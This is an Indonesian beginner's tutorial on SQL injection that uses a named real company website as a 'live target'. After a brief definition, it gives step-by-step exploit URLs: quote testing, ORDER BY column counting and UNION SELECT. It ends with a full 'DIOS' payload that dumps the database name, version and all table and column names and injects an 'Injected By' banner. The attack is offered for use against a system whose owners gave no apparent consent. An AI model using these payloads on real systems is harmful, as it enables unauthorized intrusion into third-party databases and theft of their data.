Tutorial Sql injection live target untuk pemula

 OK gays Kembali Lagi ama gw isnan:v kali ini gw akan mengajarkan kalian Sql injection untuk pemula sebelum gw mulai gw akan menjelaskan Pengertian dari Sql injection Simak di bawah ini yaa:v

SQL injection atau biasa yang dikenal dengan sebutan SQLi adalah suatu teknik penyerangan web dengan menggunakan kode SQL (Structured Query Language) yang berbahaya untuk memanipulasi database. Tindakan ini termasuk kedalam kategori hacking, dimana penyerang akan mencari celah keamanan dari suatu website.

Sebagai contoh sederhana, biasanya pengguna diminta untuk memasukkan username dan password yang hanya dapat berupa karakter angka dan huruf. Sedangkan user memasukkan karakter lain, seperti petik tunggal (‘), strip (-) atau tanda (=). Karakter-karakter tersebut merupakan bagian dari perintah umum yang digunakan untuk dapat berinteraksi dengan database. Keadaan itulah yang dimanfaatkan oleh penyerang untuk dapat mengakses informasi yang tersimpan didalam database.

Suatu website dibangun dengan menggunakan bahasa pemrograman, seperti HTML, PHP, ASP dan lainnya. Pada umumnya, beberapa bahasa pemrograman seperti PHP atau Perl akan melakukan eksekusi perintah setelah menerima inputan dari pengguna tanpa adanya filter terlebih dahulu. Oleh karena itu, Anda perlu berhati-hati dengan melakukan pemilihan terhadap jenis database yang akan digunakan. Sebab, ada jenis database yang memberikan hak terhadap low privilaged users untuk dapat mengakses password user lain yang terdapat didalam database.

Oke tanpa basa-basi Lagi kita langsung aja ke tutorial nya 

Bahan²

-doi(Kalo ada:v) 

-Kopi 

-rokok 

-dios kalian 

Live target:

https://www.kajima.co.id/news.php?id=8

OK langsung aja 

1. Kalian Cek web nya vuln atau tidak caranya Kasih Tanda petik (') dibelakang angka 8 Setelah itu enter 

Oke kita liat disitu web nya vuln 

2.kita Kasih +order+by dibelakang angka %27 kita Kasih +order+by+1--+-contoh https://www.kajima.co.id/news.php?id=8%27+order+by+1--+- Setelah itu enter

OK kita liat disini web nya tidak eror gays Jdi kita lanjutin aja sampe web nya eror caranya ganti yg 1--+- Jdi (angka sampe web eror(Bisa Jdi 2/jika Belum kita lanjutkan Lagi angkanya sampai web itu bener² eror) )--+- 

OK web nya error di angka 9 maka hasilnya Gini https://www.kajima.co.id/news.php?id=8%27+order+by+9--+-

3. Kita ganti yg order by nya ganti Jdi union+select+1,2,3,4,5,6,7,8--+- Ampe angka 8 saja karna angka 9 nya eror dan di depan angka 8 yg Ada php? Id kita Kasih min(-) maka hasilnya Gini https://www.kajima.co.id/news.php?id=-8%27+union+select+1,2,3,4,5,6,7,8--+- buat Cari angka toghel nya Setelah itu enter

OK kita liat diatas angka toghel nya Yaitu angka 3 kita hapus angka 3 ganti dios kita maka hasilnya https://www.kajima.co.id/news.php?id=-8%27+union+select+1,2,(dios kalian) ,4,5,6,7,8--+- setelah itu enter, dios yg saya gunakan: concat(0x3c6831207374796c653d22636f6c6f723a726564223e496e6a656374656420427920586e616e7a3c2f68313e,'<br>','<img src ="https://g.top4top.io/p_1914plpjk1.jpg">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

Jika sudah seperti ini berhasil :) next time nya kawan 

Contact person 

ghostcodersteam@gmail.com